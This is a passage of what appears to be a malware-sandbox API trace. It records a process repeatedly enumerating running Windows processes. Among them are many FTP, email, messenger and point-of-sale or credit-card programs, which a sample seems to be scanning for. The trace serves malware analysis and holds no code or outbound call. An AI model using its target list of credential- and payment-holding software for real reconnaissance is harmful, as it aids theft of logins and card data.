th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0266.999] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0267.000] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0267.002] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0267.003] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0267.004] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0267.006] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0267.007] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0267.009] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0267.010] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0267.011] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0267.015] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0267.017] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0267.018] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0267.020] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0267.021] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0267.023] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0267.024] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0267.025] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0267.030] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0267.032] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0267.034] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0267.035] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0267.037] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0267.039] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0267.041] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0267.094] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0267.096] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0267.097] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0267.099] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0267.101] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0267.102] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0267.104] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0267.108] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0267.110] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0267.112] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0267.113] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0267.115] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0267.116] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0267.118] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0267.123] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0267.125] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0267.128] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0267.130] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0267.132] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0267.134] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0267.188] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0267.192] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0267.195] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0267.197] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0267.203] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0267.205] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0267.207] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0267.208] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0267.210] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0267.212] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0267.217] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0267.219] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0267.221] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0267.223] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0267.225] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0267.227] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0267.310] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0267.312] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0267.314] CloseHandle (hObject=0x1018) returned 1 [0267.314] Sleep (dwMilliseconds=0x64) [0267.430] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0267.441] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.443] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0267.444] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0267.446] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0267.447] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0267.449] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0267.450] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0267.452] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0267.453] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0267.455] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.456] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.457] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0267.459] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.460] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.462] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.529] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.532] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.534] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.536] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.538] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0267.540] Process32Next (in: 